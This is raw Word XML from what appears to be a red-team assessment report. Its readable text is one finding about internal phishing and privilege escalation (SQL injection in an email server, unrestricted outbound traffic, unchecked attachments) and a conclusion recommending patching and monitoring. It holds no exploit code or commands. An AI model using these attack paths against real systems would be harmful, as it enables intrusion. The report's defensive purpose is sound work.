        </w:rPr>
        <w:t>Internal Phishing Attack and Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4CCC1B" w14:textId="7117B923" w:rsidR="00E83A63" w:rsidRPr="00E83A63" w:rsidRDefault="00E83A63" w:rsidP="00D15049">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E83A63">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Observation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393075E7" w14:textId="324D5F46" w:rsidR="00D15049" w:rsidRDefault="00D15049" w:rsidP="00D15049">
      <w:r w:rsidRPr="00D15049">
        <w:t>Target systems, such as domain-joined workstations and an internal email server, were identified by the internal environment assessment. Weak security controls, users with unusual file privileges, and an internal email program that was susceptible to SQL injection were among the opportunities for exploitation. The attack surface was further expanded by security vulnerabilities such uncontrolled external network traffic (with only incoming connections limited), missing input validation, and a lack of email attachment evaluation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E23F51" w14:textId="7DB40D52" w:rsidR="002A4142" w:rsidRDefault="002A4142">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6FFD85" w14:textId="6B093103" w:rsidR="002A4142" w:rsidRDefault="002A4142" w:rsidP="00F44ACC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc206031379"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00C55986">
        <w:t>ONCLUSION</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="5751EC6C" w14:textId="2C8022D2" w:rsidR="002A4142" w:rsidRPr="002A4142" w:rsidRDefault="002A4142" w:rsidP="002A4142">
      <w:r w:rsidRPr="002A4142">
        <w:t>The impact of unpatched vulnerabilities, poor input validation, and weak security controls inside the target environment was well illustrated by the Red Team interaction.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A4142">
        <w:t>Unauthorized access, data exfiltration, and the deployment of custom exploits were the outcomes of the completion of three of the four objectives.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A4142">
        <w:t>The unsuccessful phishing attempt made clear how crucial it is to have strong email security protocols and user awareness training.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> To </w:t>
      </w:r>
      <w:r w:rsidRPr="002A4142">
        <w:t>defend against attackers, this training highlights the necessity of timely patching, ongoing security monitoring, and defense-in-depth strategies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EFE6E5" w14:textId="77777777" w:rsidR="002A4142" w:rsidRPr="002A4142" w:rsidRDefault="002A4142" w:rsidP="002A4142"/>
    <w:p w14:paraId="7B264804" w14:textId="6020F261" w:rsidR="00D15049" w:rsidRPr="00D15049" w:rsidRDefault="00D15049" w:rsidP="00996FAD"/>
    <w:sectPr w:rsidR="00D15049" w:rsidRPr="00D15049" w:rsidSect="00A665A3">
      <w:headerReference w:type="default" r:id="rId32"/>
      <w:headerReference w:type="first" r:id="rId33"/>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A1CD7F" w14:textId="77777777" w:rsidR="009A6D01" w:rsidRDefault="009A6D01" w:rsidP="00A665A3">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2250E8D9" w14:textId="77777777" w:rsidR="009A6D01" w:rsidRDefault="009A6D01" w:rsidP="00A665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ernard MT Condensed">
    <w:panose1 w:val="02050806060905020404"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="00000003" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Aldhabi">
    <w:charset w:val="B2"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="80002007" w:usb1="80000000" w:usb2="00000008" w:usb3="00000000" w:csb0="00000041" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Bahnschrift">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8F2AE6" w14:textId="77777777" w:rsidR="009A6D01" w:rsidRDefault="009A6D01" w:rsidP="00A665A3">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="75AE7E89" w14:textId="77777777" w:rsidR="009A6D01" w:rsidRDefault="009A6D01" w:rsidP="00A665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C42428" w14:textId="139C63F3" w:rsidR="00A665A3" w:rsidRDefault="00A665A3">
    <w:pPr>
      <w:spacing w:line="264" w:lineRule="auto"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:color w:val="000000"/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3DABF9DC" wp14:editId="099D32E9">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:align>center</wp:align>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:align>center</wp:align>
              </wp:positionV>
              <wp:extent cx="7376160" cy="9555480"/>
              <wp:effectExtent l="0" t="0" r="26670" b="26670"/>
              <wp:wrapNone/>
              <wp:docPr id="222"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9DA4843" id="Rectangle 233"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37373 [1614]" strokeweight="1.25pt">
              <w10:wrap anchorx="page" anchory="page"/>
            </v:rect>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
  </w:p>
  <w:p w14:paraId="76FD7597" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665A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49D1CD" w14:textId="436E1A67" w:rsidR="00A665A3" w:rsidRDefault="00A665A3">
    <w:pPr>
      <w:spacing w:line="264" w:lineRule="auto"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:color w:val="000000"/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="250281B6" wp14:editId="6C36ED98">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:align>center</wp:align>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:align>center</wp:align>
              </wp:positionV>
              <wp:extent cx="7376160" cy="9555480"/>
              <wp:effectExtent l="0" t="0" r="26670" b="26670"/>
              <wp:wrapNone/>
              <wp:docPr id="362617684" name="Rectangle 233"/>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45651C20" id="Rectangle 233" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:0;width:580.8pt;height:752.4pt;z-index:2516613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" filled="f" strokecolor="#737373 [1614]" strokeweight="1.25pt">
              <w10:wrap anchorx="page" anchory="page"/>
            </v:rect>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
  </w:p>
  <w:p w14:paraId="257A9567" w14:textId="77777777" w:rsidR="00A665A3" w:rsidRDefault="00A665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425E3A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4366F154"/>
    <w:lvl w:ilvl="0" w:tplc="ED04563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C200DE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CE10E6A2"/>
    <w:lvl w:ilvl="0" w:tplc="ED04563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8377D3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3844E0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369643C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="98A6AAB2"/>
    <w:lvl w:ilvl="0" w:tplc="ED04563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D250A0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="805A92EE"/>
    <w:lvl w:ilvl="0" w:tplc="ED04563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3163853">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="183787552">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1459035274">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1622302632">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="69750893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5A3"/>
    <w:rsid w:val="00001E5F"/>
    <w:rsid w:val="000112E3"/>
    <w:rsid w:val="00014EA6"/>
    <w:rsid w:val="00034AE5"/>
    <w:rsid w:val="00043C61"/>
    <w:rsid w:val="000442C8"/>
    <w:rsid w:val="00047567"/>
    <w:rsid w:val="000570A6"/>
    <w:rsid w:val="000900AA"/>
    <w:rsid w:val="000B2F04"/>
    <w:rsid w:val="000B4573"/>
    <w:rsid w:val="000C205F"/>
    <w:rsid w:val="000C5348"/>
    <w:rsid w:val="000C6261"/>
    <w:rsid w:val="000F04DA"/>
    <w:rsid w:val="0010684D"/>
    <w:rsid w:val="0011150F"/>
    <w:rsid w:val="00120DA7"/>
    <w:rsid w:val="00121052"/>
    <w:rsid w:val="00126EBE"/>
    <w:rsid w:val="00136BD8"/>
    <w:rsid w:val="00137B89"/>
    <w:rsid w:val="00142C64"/>
    <w:rsid w:val="001454A6"/>
    <w:rsid w:val="001637BA"/>
    <w:rsid w:val="001751AC"/>
    <w:rsid w:val="00183681"/>
    <w:rsid w:val="001D7AFA"/>
    <w:rsid w:val="001E0755"/>
    <w:rsid w:val="001E748E"/>
    <w:rsid w:val="001E7791"/>
    <w:rsid w:val="001F1680"/>
    <w:rsid w:val="001F3F1A"/>
    <w:rsid w:val="002012FF"/>
    <w:rsid w:val="00222D9C"/>
    <w:rsid w:val="0023229A"/>
    <w:rsid w:val="002339F2"/>
    <w:rsid w:val="00280F57"/>
    <w:rsid w:val="00281E75"/>
    <w:rsid w:val="002954AD"/>
    <w:rsid w:val="002A0302"/>
    <w:rsid w:val="002A4142"/>
    <w:rsid w:val="002B28F4"/>
    <w:rsid w:val="0030679E"/>
    <w:rsid w:val="0031550A"/>
    <w:rsid w:val="0033502A"/>
    <w:rsid w:val="00340E68"/>
    <w:rsid w:val="003600E0"/>
    <w:rsid w:val="003B05DC"/>
    <w:rsid w:val="003B6162"/>
    <w:rsid w:val="003F4213"/>
    <w:rsid w:val="004106D3"/>
    <w:rsid w:val="00414478"/>
    <w:rsid w:val="004348C8"/>
    <w:rsid w:val="00445554"/>
    <w:rsid w:val="00450A61"/>
    <w:rsid w:val="00464344"/>
    <w:rsid w:val="00472798"/>
    <w:rsid w:val="00476623"/>
    <w:rsid w:val="004A24DA"/>
    <w:rsid w:val="004B1A09"/>
    <w:rsid w:val="004D2DFE"/>
    <w:rsid w:val="004E43B5"/>
    <w:rsid w:val="004F605B"/>
    <w:rsid w:val="00501D2F"/>
    <w:rsid w:val="00503046"/>
    <w:rsid w:val="00506A72"/>
    <w:rsid w:val="00510716"/>
    <w:rsid w:val="0052059B"/>
    <w:rsid w:val="005327A7"/>
    <w:rsid w:val="0055228D"/>
    <w:rsid w:val="0056262A"/>
    <w:rsid w:val="005A44E2"/>
    <w:rsid w:val="005B6670"/>
    <w:rsid w:val="005D4DBB"/>
    <w:rsid w:val="005E13DC"/>
    <w:rsid w:val="005E505C"/>
    <w:rsid w:val="00602FD0"/>
    <w:rsid w:val="00617DE6"/>
    <w:rsid w:val="00617F38"/>
    <w:rsid w:val="00647348"/>
    <w:rsid w:val="006648A2"/>
    <w:rsid w:val="00674BB5"/>
    <w:rsid w:val="00677774"/>
    <w:rsid w:val="0068098E"/>
    <w:rsid w:val="006826E2"/>
    <w:rsid w:val="006835E8"/>
    <w:rsid w:val="006D1273"/>
    <w:rsid w:val="006F5F24"/>
    <w:rsid w:val="00700F81"/>
    <w:rsid w:val="00704EEB"/>
    <w:rsid w:val="007155E8"/>
    <w:rsid w:val="00717E82"/>
    <w:rsid w:val="00747C48"/>
    <w:rsid w:val="00751DD2"/>
    <w:rsid w:val="00777C81"/>
    <w:rsid w:val="00792E1B"/>
    <w:rsid w:val="007978FF"/>
    <w:rsid w:val="007A568D"/>
    <w:rsid w:val="007B1FE7"/>
    <w:rsid w:val="007C1DF7"/>
    <w:rsid w:val="007E4DF3"/>
    <w:rsid w:val="007E5232"/>
    <w:rsid w:val="00805746"/>
    <w:rsid w:val="0081014A"/>
    <w:rsid w:val="00815735"/>
    <w:rsid w:val="00825D51"/>
    <w:rsid w:val="00834B6E"/>
    <w:rsid w:val="008515BA"/>
    <w:rsid w:val="008609E5"/>
    <w:rsid w:val="00865994"/>
    <w:rsid w:val="00883A81"/>
    <w:rsid w:val="008A2196"/>
    <w:rsid w:val="008D2F15"/>
    <w:rsid w:val="0093767E"/>
    <w:rsid w:val="009423A5"/>
    <w:rsid w:val="00950217"/>
    <w:rsid w:val="009579F3"/>
    <w:rsid w:val="00964CE7"/>
    <w:rsid w:val="00974897"/>
    <w:rsid w:val="009834A1"/>
    <w:rsid w:val="009838BC"/>
    <w:rsid w:val="00996FAD"/>
    <w:rsid w:val="009A6D01"/>
    <w:rsid w:val="009B015B"/>
    <w:rsid w:val="009C6109"/>
    <w:rsid w:val="009C6426"/>
    <w:rsid w:val="009D1BE3"/>
    <w:rsid w:val="009D1FBE"/>
    <w:rsid w:val="009F49ED"/>
    <w:rsid w:val="00A27615"/>
    <w:rsid w:val="00A32AF4"/>
    <w:rsid w:val="00A34755"/>
    <w:rsid w:val="00A556D1"/>
    <w:rsid w:val="00A60940"/>
    <w:rsid w:val="00A665A3"/>
    <w:rsid w:val="00A7002D"/>
    <w:rsid w:val="00A918AC"/>
    <w:rsid w:val="00A9778A"/>
    <w:rsid w:val="00AB6D5C"/>
    <w:rsid w:val="00AD130F"/>
    <w:rsid w:val="00AF616D"/>
    <w:rsid w:val="00B25E66"/>
    <w:rsid w:val="00B435A2"/>
    <w:rsid w:val="00BC0925"/>
    <w:rsid w:val="00BD5F9E"/>
    <w:rsid w:val="00BF75CF"/>
    <w:rsid w:val="00C41698"/>
    <w:rsid w:val="00C43F3D"/>
    <w:rsid w:val="00C5199B"/>
    <w:rsid w:val="00C55986"/>
    <w:rsid w:val="00C920E6"/>
    <w:rsid w:val="00CA5AEB"/>
    <w:rsid w:val="00CC5CB8"/>
    <w:rsid w:val="00CF06C5"/>
    <w:rsid w:val="00D103BD"/>
    <w:rsid w:val="00D15049"/>
    <w:rsid w:val="00D639D0"/>
    <w:rsid w:val="00DB4168"/>
    <w:rsid w:val="00DC0710"/>
    <w:rsid w:val="00DD592A"/>
    <w:rsid w:val="00DE105E"/>
    <w:rsid w:val="00E36209"/>
    <w:rsid w:val="00E36714"/>
    <w:rsid w:val="00E6102A"/>
    <w:rsid w:val="00E62DDA"/>
    <w:rsid w:val="00E72676"/>
    <w:rsid w:val="00E82A9A"/>
    <w:rsid w:val="00E83A63"/>
    <w:rsid w:val="00E84B46"/>
    <w:rsid w:val="00EA0BCC"/>
    <w:rsid w:val="00EA15C9"/>
    <w:rsid w:val="00EA2790"/>
    <w:rsid w:val="00EA520F"/>
    <w:rsid w:val="00EE0D11"/>
    <w:rsid w:val="00F22377"/>
    <w:rsid w:val="00F41F46"/>
    <w:rsid w:val="00F43D58"/>
    <w:rsid w:val="00F44ACC"/>
    <w:rsid w:val="00F71963"/>
    <w:rsid w:val="00F735CC"/>
    <w:rsid w:val="00F82D0B"/>
    <w:rsid w:val="00F8525B"/>
    <w:rsid w:val="00FA6A92"/>
    <w:rsid w:val="00FB11D9"/>
    <w:rsid w:val="00FB6AB9"/>
    <w:rsid w:val="00FE7E33"/>
    <w:rsid w:val="00FF5A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921DD9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9CEC0B6C-6DA3-404E-9D16-DBE1C9DF0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665A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665A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665A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665A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665A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665A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665A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665A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665A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665A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665A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665A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665A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665A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665A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65A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65A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65A3"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00A665A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65A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65A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65A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65A3"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00A665A3"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00A665A3"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00A665A3"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00A665A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665A3"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00A665A3"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A665A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65A3"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A665A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65A3"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:link w:val="NoSpacingChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00A665A3"/>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A665A3"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="005B6670"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="0" w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0010684D"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0010684D"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="0046434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A2196"/>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45112">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="291637491">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="530801059">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="749499536">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="767235931">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="792594795">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="806166625">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="815757989">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="943726167">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="962466561">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1224637234">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1270235300">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1308172819">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1314410615">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1341155842">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
